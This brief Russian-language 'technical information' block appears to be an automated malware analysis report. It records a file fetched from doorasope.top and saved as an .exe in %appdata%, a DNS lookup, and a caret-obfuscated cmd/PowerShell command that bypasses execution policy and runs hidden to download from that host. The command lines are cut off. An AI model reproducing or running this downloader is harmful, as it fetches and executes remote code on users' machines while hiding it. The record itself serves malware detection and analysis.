Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^WE^R^She^Ll.eX^e^ -ExeC^UtIO^N^pOlICY ^bYpA^SS -N^oPr^O^File^ -^wi^nD^OW^st^Y^L^e H^i^DD^en^ (NEW-obJec^T^ s^Y^ST^Em.NeT.w^Eb^cL^iE^nT).D^O^wn^lOadFIl^e^('http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pO^WE^R^She^Ll.eX^e^ -ExeC^UtIO^N^pOlICY ^bYpA^SS -N^oPr^O^File^ -^wi^nD^OW^st^Y^L^e H^i^DD^en^ (NEW-obJec^T^ s^Y^ST^Em.NeT.w^Eb^cL^iE^nT).D^O^wn^lOadFIl^e^('http://www.doo...' (со скрытым окном)